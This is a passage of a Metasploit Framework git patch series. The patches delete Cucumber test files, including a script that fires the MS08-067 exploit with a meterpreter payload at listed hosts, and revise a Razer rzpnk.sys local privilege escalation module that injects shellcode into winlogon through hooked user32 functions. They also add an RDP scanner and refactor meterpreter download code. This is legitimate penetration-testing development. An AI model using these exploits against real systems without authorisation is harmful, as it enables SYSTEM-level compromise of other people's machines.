- """ - - self.run_single("spool #{Rails.root.join('tmp', 'console.log')}") - hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml') - payload_name = 'windows/meterpreter/bind_tcp' - exploited_hosts = [] - failed_hosts = [] - - hosts.each do |host| - print_status("Trying MS08-067 against #{host['ipAddress']}") - mod = framework.exploits.create('windows/smb/ms08_067_netapi') - mod.datastore['PAYLOAD'] = payload_name - mod.datastore['RHOST'] = host['ipAddress'] - m = mod.exploit_simple( - 'LocalInput' => nil, - 'LocalOutput' => nil, - 'Payload' => payload_name, - 'RunAsJob' => false - ) - - sleep(1) - - if m - exploited_hosts << host['ipAddress'] - else - failed_hosts << host['ipAddress'] - end - end - - print_status("Exploited hosts: #{exploited_hosts.inspect}") - print_status("Failed hosts: #{failed_hosts.inspect}") - self.run_single('sessions -K') - - """ - When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds - Then the 'Mdm::Host' table contains the expected targets - \ No newline at end of file diff --git a/features/msfconsole/database_yml.feature b/features/msfconsole/database_yml.feature deleted file mode 100644 index f2b40c213b..0000000000 --- a/features/msfconsole/database_yml.feature +++ /dev/null @@ -1,153 +0,0 @@ -@boot -Feature: `msfconsole` `database.yml` - - In order to connect to the database in `msfconsole` - As a user calling `msfconsole` from a terminal - I want to be able to set the path of the `database.yml` in one of 4 locations (in order of precedence): - - 1. An explicit argument to the `-y` flag to `msfconsole` - 2. The MSF_DATABASE_CONFIG environment variable - 3. The user's `~/.msf4/database.yml` - 4. `config/database.yml` in the metasploit-framework checkout location. - - Scenario: With all 4 locations, --yaml wins - Given a file named "command_line.yml" with: - """ - test: - adapter: postgresql - database: command_line_metasploit_framework_test - username: command_line_metasploit_framework_test - """ - And a file named "msf_database_config.yml" with: - """ - test: - adapter: postgresql - database: environment_metasploit_framework_test - username: environment_metasploit_framework_test - """ - And I set the environment variables to: - | variable | value | - | MSF_DATABASE_CONFIG | msf_database_config.yml | - And a directory named "home" - And I cd to "home" - And a mocked home directory - And a directory named ".msf4" - And I cd to ".msf4" - And a file named "database.yml" with: - """ - test: - adapter: postgresql - database: user_metasploit_framework_test - username: user_metasploit_framework_test - """ - And I cd to "../.." - And the project "database.yml" exists with: - """ - test: - adapter: postgresql - database: project_metasploit_framework_test - username: project_metasploit_framework_test - """ - When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit --yaml command_line.yml` - Then the output should contain "command_line_metasploit_framework_test" - - Scenario: Without --yaml, MSF_DATABASE_CONFIG wins - Given a file named "msf_database_config.yml" with: - """ - test: - adapter: postgresql - database: environment_metasploit_framework_test - username: environment_metasploit_framework_test - """ - And I set the environment variables to: - | variable | value | - | MSF_DATABASE_CONFIG | msf_database_config.yml | - And a directory named "home" - And I cd to "home" - And a mocked home directory - And a directory named ".msf4" - And I cd to ".msf4" - And a file named "database.yml" with: - """ - test: - adapter: postgresql - database: user_metasploit_framework_test - username: user_metasploit_framework_test - """ - And I cd to "../.." - And the project "database.yml" exists with: - """ - test: - adapter: postgresql - database: project_metasploit_framework_test - username: project_metasploit_framework_test - """ - When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit` - Then the output should contain "environment_metasploit_framework_test" - - Scenario: Without --yaml or MSF_DATABASE_CONFIG, ~/.msf4/database.yml wins - Given I unset the environment variables: - | variable | - | MSF_DATABASE_CONFIG | - And a directory named "home" - And I cd to "home" - And a mocked home directory - And a directory named ".msf4" - And I cd to ".msf4" - And a file named "database.yml" with: - """ - test: - adapter: postgresql - database: user_metasploit_framework_test - username: user_metasploit_framework_test - """ - And I cd to "../.." - And the project "database.yml" exists with: - """ - test: - adapter: postgresql - database: project_metasploit_framework_test - username: project_metasploit_framework_test - """ - When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit` - Then the output should contain "user_metasploit_framework_test" - - Scenario: Without --yaml, MSF_DATABASE_CONFIG or ~/.msf4/database.yml, project "database.yml" wins - Given I unset the environment variables: - | variable | - | MSF_DATABASE_CONFIG | - And a directory named "home" - And I cd to "home" - And a mocked home directory - And I cd to "../.." - And the project "database.yml" exists with: - """ - test: - adapter: postgresql - database: project_metasploit_framework_test - username: project_metasploit_framework_test - """ - When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit` - Then the output should contain "project_metasploit_framework_test" - - - Scenario: Without --yaml, MSF_DATABASE_CONFIG, ~/.msf4/database.yml, or project "database.yml", no database connection - Given I unset the environment variables: - | variable | - | MSF_DATABASE_CONFIG | - And a directory named "home" - And I cd to "home" - And a mocked home directory - And I cd to "../.." - And the project "database.yml" does not exist - When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit` - Then the output should not contain "command_line_metasploit_framework_test" - And the output should not contain "environment_metasploit_framework_test" - And the output should not contain "user_metasploit_framework_test" - And the output should not contain "project_metasploit_framework_test" - And the output should contain "[*] postgresql selected, no connection" - - Scenario: Starting `msfconsole` with a valid database.yml - When I run `msfconsole -q --defer-module-loads --execute-command db_status --execute-command exit` - Then the output should contain "[*] postgresql connected to metasploit_framework_test" - diff --git a/features/step_definitions/environment_variables.rb b/features/step_definitions/environment_variables.rb deleted file mode 100644 index c554ca0264..0000000000 --- a/features/step_definitions/environment_variables.rb +++ /dev/null @@ -1,20 +0,0 @@ -Given /^I unset the environment variables:$/ do |table| - table.hashes.each do |row| - variable = row['variable'].to_s.upcase - - # @todo add extension to Announcer - announcer.instance_eval do - if @options[:env] - print "$ unset #{variable}" - end - end - - current_value = ENV.delete(variable) - - # if original_env already has the key, then the true original was already recorded from a previous unset or set, - # so don't record the current value as it will cause ENV not to be restored after the Scenario. - unless original_env.key? variable - original_env[variable] = current_value - end - end -end \ No newline at end of file diff --git a/features/step_definitions/project.rb b/features/step_definitions/project.rb deleted file mode 100644 index 1c24f07254..0000000000 --- a/features/step_definitions/project.rb +++ /dev/null @@ -1,14 +0,0 @@ -require 'metasploit/framework/database/cucumber' - -Given /^the project "database.yml" does not exist$/ do - Metasploit::Framework::Database::Cucumber.backup_project_configurations -end - -Given /^the project "database.yml" exists with:$/ do |file_content| - Metasploit::Framework::Database::Cucumber.backup_project_configurations - File.open(Metasploit::Framework::Database::Cucumber.project_configurations_path, 'wb') { |file| file.write(file_content) } -end - -After do - Metasploit::Framework::Database::Cucumber.restore_project_configurations -end \ No newline at end of file diff --git a/features/support/bin/stty b/features/support/bin/stty deleted file mode 100755 index 8ff68bb1c5..0000000000 --- a/features/support/bin/stty +++ /dev/null @@ -1,26 +0,0 @@ -#!/usr/bin/env ruby - -case ARGV[0] - when 'size' - puts "30 134" - when '-a' - puts <; - eol2 = ; erase = ^?; intr = ^C; kill = ^U; lnext = ^V; - min = 1; quit = ^\; reprint = ^R; start = ^Q; status = ^T; - stop = ^S; susp = ^Z; time = 0; werase = ^W; -EOS - when '-g' - puts "gfmt1:cflag=4b00:iflag=6b02:lflag=200005cf:oflag=3:discard=f:dsusp=19:eof=4:eol=ff:eol2=ff:erase=7f:intr=3:kill=15:lnext=16:min=1:quit=1c:reprint=12:start=11:status=14:stop=13:susp=1a:time=0:werase=17:ispeed=38400:ospeed=38400" -end - -exit 0 diff --git a/features/support/env.rb b/features/support/env.rb deleted file mode 100644 index 6d186f405f..0000000000 --- a/features/support/env.rb +++ /dev/null @@ -1,34 +0,0 @@ -# @note `require 'simplecov'` is not used here because all features currently use external `msfconsole` process, so only -# that child process needs to load 'simplecov'. - -# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril. -# It is recommended to regenerate this file in the future when you upgrade to a -# newer version of cucumber-rails. Consider adding your own code to a new file -# instead of editing this one. Cucumber will automatically load all features/**/*.rb -# files. - -require 'cucumber/rails' -require 'aruba/cucumber' - -# Capybara defaults to XPath selectors rather than Webrat's default of CSS3. In -# order to ease the transition to Capybara we set the default here. If you'd -# prefer to use XPath just remove this line and adjust any selectors in your -# steps to use the XPath syntax. -Capybara.default_selector = :css - -# By default, any exception happening in your Rails application will bubble up -# to Cucumber so that your scenario will fail. This is a different from how -# your application behaves in the production environment, where an error page will -# be rendered instead. -# -# Sometimes we want to override this default behaviour and allow Rails to rescue -# exceptions and display an error page (just like when the app is running in production). -# Typical scenarios where you want to do this is when you test your error pages. -# There are two ways to allow Rails to rescue exceptions: -# -# 1) Tag your scenario (or feature) with @allow-rescue -# -# 2) Set the value below to true. Beware that doing this globally is not -# recommended as it will mask a lot of errors for you! -# -ActionController::Base.allow_rescue = false diff --git a/features/support/hooks.rb b/features/support/hooks.rb deleted file mode 100644 index 16c5973ef2..0000000000 --- a/features/support/hooks.rb +++ /dev/null @@ -1,39 +0,0 @@ -Before do - set_env('MSF_DATBASE_CONFIG', Rails.configuration.paths['config/database'].existent.first) - set_env('RAILS_ENV', 'test') - @aruba_timeout_seconds = 8.minutes -end - -Before('@db') do |scenario| - dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname)) - ActiveRecord::Base.establish_connection(dbconfig["test"]) -end - -# don't setup child processes to load simplecov_setup.rb if simplecov isn't installed -# unless Bundler.settings.without.include?(:coverage) -# Before do |scenario| -# command_name = case scenario -# when Cucumber::Ast::Scenario, Cucumber::Ast::ScenarioOutline -# "#{scenario.feature.title} #{scenario.name}" -# when Cucumber::Ast::OutlineTable::ExampleRow -# scenario_outline = scenario.scenario_outline -# -# "#{scenario_outline.feature.title} #{scenario_outline.name} #{scenario.name}" -# else -# raise TypeError, "Don't know how to extract command name from #{scenario.class}" -# end -# -# # Used in simplecov_setup so that each scenario has a different name and their coverage results are merged instead -# # of overwriting each other as 'Cucumber Features' -# set_env('SIMPLECOV_COMMAND_NAME', command_name) -# -# simplecov_setup_pathname = Pathname.new(__FILE__).expand_path.parent.join('simplecov_setup') -# # set environment variable so child processes will merge their coverage data with parent process's coverage data. -# set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}") -# end -# -# Before('@db') do |scenario| -# dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname)) -# ActiveRecord::Base.establish_connection(dbconfig["test"]) -# end -# end diff --git a/features/support/simplecov_setup.rb b/features/support/simplecov_setup.rb deleted file mode 100644 index 78cc264fc3..0000000000 --- a/features/support/simplecov_setup.rb +++ /dev/null @@ -1,16 +0,0 @@ -# @note this file is loaded in env.rb to setup simplecov using RUBYOPTs for child processes - -simplecov_command_name = ENV['SIMPLECOV_COMMAND_NAME'] - -# will not be set if hook does not run because `bundle install --without coverage` -if simplecov_command_name - require 'simplecov' - - require 'pathname' - - root = Pathname(__FILE__).expand_path.parent.parent.parent - - SimpleCov.command_name(simplecov_command_name) - SimpleCov.root(root) - load root.join('.simplecov') -end diff --git a/features/support/stty.rb b/features/support/stty.rb deleted file mode 100644 index a8afb704c4..0000000000 --- a/features/support/stty.rb +++ /dev/null @@ -1,11 +0,0 @@ -require 'pathname' - -support = Pathname.new(__FILE__).realpath.parent - -paths = [ - # adds support/bin at the front of the path so that the support/bin/stty script will be used to fake system stty - # output. - support.join('bin').to_path, - ENV['PATH'] -] -ENV['PATH'] = paths.join(File::PATH_SEPARATOR) diff --git a/features/support/targets.yml.example b/features/support/targets.yml.example deleted file mode 100644 index 0752a6cc7e..0000000000 --- a/features/support/targets.yml.example +++ /dev/null @@ -1,7 +0,0 @@ -windows: - - - hostname: wxpsp0 - ip: 127.0.0.100 - - - hostname: wxpsp2 - ip: 127.0.0.101 diff --git a/lib/metasploit/framework/database/cucumber.rb b/lib/metasploit/framework/database/cucumber.rb deleted file mode 100644 index 562504c88b..0000000000 --- a/lib/metasploit/framework/database/cucumber.rb +++ /dev/null @@ -1,36 +0,0 @@ -require 'metasploit/framework/database' - -module Metasploit::Framework::Database::Cucumber - def self.project_configurations_path - Rails.root.join('config', 'database.yml').to_path - end - - def self.backup_project_configurations - if File.exist?(project_configurations_path) - # assume that the backup file is from a previously aborted run and it contains the real database.yml data, so - # just delete the fake database.yml and the After hook will restore the real database.yml from the backup location - if File.exist?(backup_project_configurations_path) - File.delete(project_configurations_path) - else - # project contains the real database.yml and there was no previous, aborted run. - File.rename(project_configurations_path, backup_project_configurations_path) - end - end - end - - def self.backup_project_configurations_path - "#{project_configurations_path}.cucumber.bak" - end - - def self.restore_project_configurations - if File.exist?(backup_project_configurations_path) - if File.exist?(project_configurations_path) - # Remove fake, leftover database.yml - File.delete(project_configurations_path) - end - - File.rename(backup_project_configurations_path, project_configurations_path) - end - end -end - diff --git a/lib/tasks/cucumber.rake b/lib/tasks/cucumber.rake deleted file mode 100644 index ff424fa7b0..0000000000 --- a/lib/tasks/cucumber.rake +++ /dev/null @@ -1,74 +0,0 @@ -# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril. -# It is recommended to regenerate this file in the future when you upgrade to a -# newer version of cucumber-rails. Consider adding your own code to a new file -# instead of editing this one. Cucumber will automatically load all features/**/*.rb -# files. - - -unless ARGV.any? {|a| a =~ /^gems/} # Don't load anything when running the gems:* tasks - -vendored_cucumber_bin = Dir["#{Rails.root}/vendor/{gems,plugins}/cucumber*/bin/cucumber"].first -$LOAD_PATH.unshift(File.dirname(vendored_cucumber_bin) + '/../lib') unless vendored_cucumber_bin.nil? - -begin - require 'cucumber/rake/task' - - namespace :cucumber do - Cucumber::Rake::Task.new({:ok => 'db:test:prepare'}, 'Run features that should pass') do |t| - t.binary = vendored_cucumber_bin # If nil, the gem's binary is used. - t.fork = true # You may get faster startup if you set this to false - t.profile = 'default' - end - - Cucumber::Rake::Task.new({:wip => 'db:test:prepare'}, 'Run features that are being worked on') do |t| - t.binary = vendored_cucumber_bin - t.fork = true # You may get faster startup if you set this to false - t.profile = 'wip' - end - - Cucumber::Rake::Task.new({:rerun => 'db:test:prepare'}, 'Record failing features and run only them if any exist') do |t| - t.binary = vendored_cucumber_bin - t.fork = true # You may get faster startup if you set this to false - t.profile = 'rerun' - end - - desc 'Run all features' - task :all => [:ok, :wip] - - task :statsetup do - require 'rails/code_statistics' - ::STATS_DIRECTORIES << %w(Cucumber\ features features) if File.exist?('features') - ::CodeStatistics::TEST_TYPES << "Cucumber features" if File.exist?('features') - end - end - desc 'Alias for cucumber:ok' - task :cucumber => 'cucumber:ok' - - task :default => :cucumber - - task :features => :cucumber do - STDERR.puts "*** The 'features' task is deprecated. See rake -T cucumber ***" - end - - # In case we don't have ActiveRecord, append a no-op task that we can depend upon. - task 'db:test:prepare' do - end - - task 'db:config:restore' do - require 'metasploit/framework/database/cucumber' - Metasploit::Framework::Database::Cucumber.restore_project_configurations - end - - # Restore the config/database.yml from config/database.cucumber.yml before attempting to copy development to test - # database in order to recover from interrupted cucumber runs - task 'environment' => 'db:config:restore' - - task :stats => 'cucumber:statsetup' -rescue LoadError - desc 'cucumber rake task not available (cucumber not installed)' - task :cucumber do - abort 'Cucumber rake task is not available. Be sure to install cucumber as a gem or plugin' - end -end - -end diff --git a/lib/tasks/custom_cucumber.rake b/lib/tasks/custom_cucumber.rake deleted file mode 100644 index 9b8c3fb8ae..0000000000 --- a/lib/tasks/custom_cucumber.rake +++ /dev/null @@ -1,30 +0,0 @@ -unless ARGV.any? {|a| a =~ /^gems/} # Don't load anything when running the gems:* tasks - -vendored_cucumber_bin = Dir["#{Rails.root}/vendor/{gems,plugins}/cucumber*/bin/cucumber"].first -$LOAD_PATH.unshift(File.dirname(vendored_cucumber_bin) + '/../lib') unless vendored_cucumber_bin.nil? - -begin - require 'cucumber/rake/task' - - namespace :cucumber do - Cucumber::Rake::Task.new({:boot => 'db:test:prepare'}, 'Run features that should pass') do |t| - t.binary = vendored_cucumber_bin # If nil, the gem's binary is used. - t.fork = true # You may get faster startup if you set this to false - t.profile = 'boot' - end - Cucumber::Rake::Task.new({:exploit => 'db:test:prepare'}, 'Run features that should pass') do |t| - t.binary = vendored_cucumber_bin # If nil, the gem's binary is used. - t.fork = true # You may get faster startup if you set this to false - t.profile = 'exploit' - end - - end - -rescue LoadError - desc 'cucumber rake task not available (cucumber not installed)' - task :cucumber do - abort 'Cucumber rake task is not available. Be sure to install cucumber as a gem or plugin' - end -end - -end \ No newline at end of file diff --git a/script/cucumber b/script/cucumber deleted file mode 100755 index 7fa5c92086..0000000000 --- a/script/cucumber +++ /dev/null @@ -1,10 +0,0 @@ -#!/usr/bin/env ruby - -vendored_cucumber_bin = Dir["#{File.dirname(__FILE__)}/../vendor/{gems,plugins}/cucumber*/bin/cucumber"].first -if vendored_cucumber_bin - load File.expand_path(vendored_cucumber_bin) -else - require 'rubygems' unless ENV['NO_RUBYGEMS'] - require 'cucumber' - load Cucumber::BINARY -end From 5470670223ae9ac4bcb99e2c6caf0d082645ec1b Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Tue, 11 Jul 2017 11:19:32 -0400 Subject: [PATCH 24/63] Change the hook for windows 10 compatibility --- .../windows/local/razer_zwopenprocess.rb | 74 ++++++++++--------- 1 file changed, 41 insertions(+), 33 deletions(-) diff --git a/modules/exploits/windows/local/razer_zwopenprocess.rb b/modules/exploits/windows/local/razer_zwopenprocess.rb index 177a06424b..4f25abb623 100644 --- a/modules/exploits/windows/local/razer_zwopenprocess.rb +++ b/modules/exploits/windows/local/razer_zwopenprocess.rb @@ -13,26 +13,29 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Local::WindowsKernel include Msf::Post::Windows::Priv + # the max size our hook can be, used before it's generated for the allocation + HOOK_STUB_MAX_LENGTH = 256 + def initialize(info = {}) super(update_info(info, - 'Name' => 'Razer Synapse rzpnk.sys IOCTL', + 'Name' => 'Razer Synapse rzpnk.sys ZwOpenProcess', 'Description' => %q{ A vulnerability exists in the latest version of Razer Synapse - (v2.20.17.302) which can be leveraged locally by a malicious application - to elevate its privileges to those of NT_AUTHORITY\SYSTEM. The - vulnerability lies in a specific IOCTL handler in the rzpnk.sys driver - that passes a PID specified by the user to ZwOpenProcess. This can be - issued by an application to open a handle to an arbitrary process with - the necessary privileges to allocate, read and write memory in the - specified process. + (v2.20.15.1104 as of the day of disclosure) which can be leveraged + locally by a malicious application to elevate its privileges to those of + NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler + in the rzpnk.sys driver that passes a PID specified by the user to + ZwOpenProcess. This can be issued by an application to open a handle to + an arbitrary process with the necessary privileges to allocate, read and + write memory in the specified process. This exploit leverages this vulnerability to open a handle to the winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by - installing hooks to execute attacker controlled shellcode. These hooks - are then triggered on demand by calling user32!LockWorkStation(), - resulting in the attacker's payload being executed with the privileges - of the infected winlogon process. In order for the issued IOCTL to work, - the RazerIngameEngine.exe process must not be running. This exploit will + installing a hook to execute attacker controlled shellcode. This hook is + then triggered on demand by calling user32!LockWorkStation(), resulting + in the attacker's payload being executed with the privileges of the + infected winlogon process. In order for the issued IOCTL to work, the + RazerIngameEngine.exe process must not be running. This exploit will check if it is, and attempt to kill it as necessary. The vulnerable software can be found here: @@ -45,20 +48,21 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => 'Spencer McIntyre', 'License' => MSF_LICENSE, 'References' => [ - ['CVE', 'CVE-2017-9769'], - #['URL', ''], + ['CVE', '2017-9769'], + ['URL', 'https://warroom.securestate.com/cve-2017-9769/'] ], 'Platform' => 'win', 'Targets' => [ # Tested on (64 bits): # * Windows 7 SP1 - # * Windows 10.0.14385 + # * Windows 10.0.10586 [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], 'DefaultOptions' => { - 'EXITFUNC' => 'thread' + 'EXITFUNC' => 'thread', + 'WfsDelay' => 20 }, 'DefaultTarget' => 0, 'Privileged' => true, @@ -103,42 +107,47 @@ class MetasploitModule < Msf::Exploit::Remote end pid = session.sys.process['winlogon.exe'] - print_status("Found winlogon.exe pid: #{pid}") + print_status("Found winlogon pid: #{pid}") handle = get_handle(pid) fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil? + vprint_status('Successfully opened a handle to the winlogon process') winlogon = session.sys.process.new(pid, handle) - shellcode_address = winlogon.memory.allocate(4096) + allocation_size = payload.encoded.length + HOOK_STUB_MAX_LENGTH + shellcode_address = winlogon.memory.allocate(allocation_size) winlogon.memory.protect(shellcode_address) - print_good("Allocated 4096 bytes in winlogon.exe at 0x#{shellcode_address.to_s(16)}") + print_good("Allocated #{allocation_size} bytes in winlogon at 0x#{shellcode_address.to_s(16)}") winlogon.memory.write(shellcode_address, payload.encoded) hook_stub_address = shellcode_address + payload.encoded.length - result = session.railgun.kernel32.LoadLibraryA('winsta') - fail_with(Failure::Unknown, 'Failed to get a handle to winsta.dll') if result['return'] == 0 - winsta_handle = result['return'] + result = session.railgun.kernel32.LoadLibraryA('user32') + fail_with(Failure::Unknown, 'Failed to get a handle to user32.dll') if result['return'] == 0 + user32_handle = result['return'] # resolve and backup the functions that we'll install trampolines in - winsta_trampolines = {} # address => original chunk - winsta_functions = ['_WinStationWaitForConnect', 'WinStationIsSessionRemoteable'] - winsta_functions.each do |function| - address = get_address(winsta_handle, function) + user32_trampolines = {} # address => original chunk + user32_functions = ['LockWindowStation'] + user32_functions.each do |function| + address = get_address(user32_handle, function) winlogon.memory.protect(address) - winsta_trampolines[function] = { + user32_trampolines[function] = { address: address, original: winlogon.memory.read(address, 24) } end # generate and install the hook asm - hook_stub = get_hook(shellcode_address, winsta_trampolines) + hook_stub = get_hook(shellcode_address, user32_trampolines) fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil? + # if this happens, there was a programming error + fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > HOOK_STUB_MAX_LENGTH + winlogon.memory.write(hook_stub_address, hook_stub) - vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon.exe at 0x#{hook_stub_address}") + vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}") # install the asm trampolines to jump to the hook - winsta_trampolines.each do |function, trampoline_info| + user32_trampolines.each do |function, trampoline_info| address = trampoline_info[:address] trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{ mov rax, 0x#{address.to_s(16)} @@ -147,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote jmp rax }).encode_string winlogon.memory.write(address, trampoline) - vprint_status("Installed winsta!#{address} trampoline at 0x#{address.to_s(16)}") + vprint_status("Installed user32!#{function} trampoline at 0x#{address.to_s(16)}") end session.railgun.user32.LockWorkStation() @@ -241,7 +250,6 @@ class MetasploitModule < Msf::Exploit::Remote pop r9 ret } - print_line(stub) Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string end end From 5c17f363be4185d693e2539acdd2a99eca82c39c Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 12 Jul 2017 17:29:23 -0500 Subject: [PATCH 25/63] Default opts to an empty hash instead of nil Fixes #8709 --- .../meterpreter/extensions/stdapi/fs/dir.rb | 20 +++++++---------- .../meterpreter/extensions/stdapi/fs/file.rb | 22 ++++++++----------- 2 files changed, 17 insertions(+), 25 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb index eb2550ef9b..607a030bb4 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb @@ -195,19 +195,15 @@ class Dir < Rex::Post::Dir # Downloads the contents of a remote directory a # local directory, optionally in a recursive fashion. # - def Dir.download(dst, src, opts, force = true, glob = nil, &stat) - recursive = false - continue = false - tries = false - tries_no = 0 + def Dir.download(dst, src, opts = {}, force = true, glob = nil, &stat) tries_cnt = 0 - if opts - timestamp = opts["timestamp"] - recursive = true if opts["recursive"] - continue = true if opts["continue"] - tries = true if opts["tries"] - tries_no = opts["tries_no"] - end + + continue = opts["continue"] + recursive = opts["recursive"] + timestamp = opts["timestamp"] + tries_no = opts["tries_no"] || 0 + tries = opts["tries"] + begin dir_files = self.entries(src, glob) rescue Rex::TimeoutError diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb index 72ab8bfa71..5c23bda8a2 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb @@ -301,8 +301,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO # If a block is given, it will be called before each file is downloaded and # again when each download is complete. # - def File.download(dest, src_files, opts = nil, &stat) - timestamp = opts["timestamp"] if opts + def File.download(dest, src_files, opts = {}, &stat) + timestamp = opts["timestamp"] [*src_files].each { |src| if (::File.basename(dest) != File.basename(src)) # The destination when downloading is a local file so use this @@ -324,18 +324,15 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO # # Download a single file. # - def File.download_file(dest_file, src_file, opts = nil, &stat) - continue=false - tries=false - tries_no=0 + def File.download_file(dest_file, src_file, opts = {}, &stat) stat ||= lambda { |a,b,c| } - if opts - continue = true if opts["continue"] - adaptive = true if opts['adaptive'] - tries = true if opts["tries"] - tries_no = opts["tries_no"] - end + adaptive = opts["adaptive"] + block_size = opts["block_size"] || 1024 * 1024 + continue = opts["continue"] + tries_no = opts["tries_no"] + tries = opts["tries"] + src_fd = client.fs.file.new(src_file, "rb") # Check for changes @@ -373,7 +370,6 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO end # Keep transferring until EOF is reached... - block_size = (opts && opts['block_size']) || 1024 * 1024 begin if tries # resume when timeouts encountered From 833b2a67d43eb12a7da3a6c4b252f3bf9714b5a6 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Fri, 14 Jul 2017 07:06:54 -0400 Subject: [PATCH 26/63] Fix the architecture check for only x64 --- modules/exploits/windows/local/razer_zwopenprocess.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/local/razer_zwopenprocess.rb b/modules/exploits/windows/local/razer_zwopenprocess.rb index 4f25abb623..b7e44c6825 100644 --- a/modules/exploits/windows/local/razer_zwopenprocess.rb +++ b/modules/exploits/windows/local/razer_zwopenprocess.rb @@ -92,10 +92,8 @@ class MetasploitModule < Msf::Exploit::Remote if sysinfo['Architecture'] =~ /wow64/i fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') - elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 - fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') - elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 - fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') + elsif sysinfo['Architecture'] == ARCH_X86 + fail_with(Failure::NoTarget, 'Session host is x86, but only x64 targets are supported') end pid = session.sys.process['RazerIngameEngine.exe'] From e3e5c33b9bc9a799bd9b018f7ac003cb964906fa Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Fri, 14 Jul 2017 13:02:43 -0700 Subject: [PATCH 27/63] WIP commit of RDP scanner --- modules/auxiliary/scanner/rdp/rdp_scanner.rb | 75 ++++++++++++++++++++ 1 file changed, 75 insertions(+) create mode 100644 modules/auxiliary/scanner/rdp/rdp_scanner.rb diff --git a/modules/auxiliary/scanner/rdp/rdp_scanner.rb b/modules/auxiliary/scanner/rdp/rdp_scanner.rb new file mode 100644 index 0000000000..a5a7637826 --- /dev/null +++ b/modules/auxiliary/scanner/rdp/rdp_scanner.rb @@ -0,0 +1,75 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Identify endpoints speaking the Remote Desktop Protocol (RDP)', + 'Description' => %q( + This module attempts to connect to the specified Remote Desktop Protocol port + and determines if it speaks RDP. + ), + 'Author' => 'Jon Hart ', + 'References' => + [ + ], + 'License' => MSF_LICENSE + ) + ) + + register_options( + [ + Opt::RPORT(3389) + # XXX: add options to turn on/off TLS, CredSSP, early user, cookies, etc. + ] + ) + end + + # simple TPKT v3 + x.224 COTP Connect Request + RDP negotiation request with TLS and CredSSP requested + RDP_PROBE = "\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00" + # any TPKT v3 + x.2224 COTP Connect Confirm + RDP_RE = /^\x03\x00.{3}\xd0.{7}.*$/ + def rdp? + sock.put(RDP_PROBE) + response = sock.get_once(-1) + if response + if RDP_RE.match?(response) + # XXX: it might be helpful to decode the response and show what was selected. + print_good("Identified RDP") + return true + else + vprint_status("No match for '#{Rex::Text.to_hex_ascii(response)}'") + end + else + vprint_status("No response") + end + end + + def run_host(_ip) + begin + connect + return unless rdp? + rescue Rex::AddressInUse, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, \ + ::Errno::ETIMEDOUT, ::Timeout::Error, ::EOFError => e + vprint_error("error while connecting and negotiating RDP: #{e}") + return + ensure + disconnect + end + + service = report_service( + host: rhost, + port: rport, + proto: 'tcp', + name: 'RDP' + ) + end +end From b4813ce2c7fb72732377c85c033856886c861e89 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Sat, 15 Jul 2017 14:48:54 -0400 Subject: [PATCH 28/63] Update the pre-exploit check conditions --- .../windows/local/razer_zwopenprocess.rb | 31 ++++++++++++------- 1 file changed, 19 insertions(+), 12 deletions(-) diff --git a/modules/exploits/windows/local/razer_zwopenprocess.rb b/modules/exploits/windows/local/razer_zwopenprocess.rb index b7e44c6825..2bbf3cb827 100644 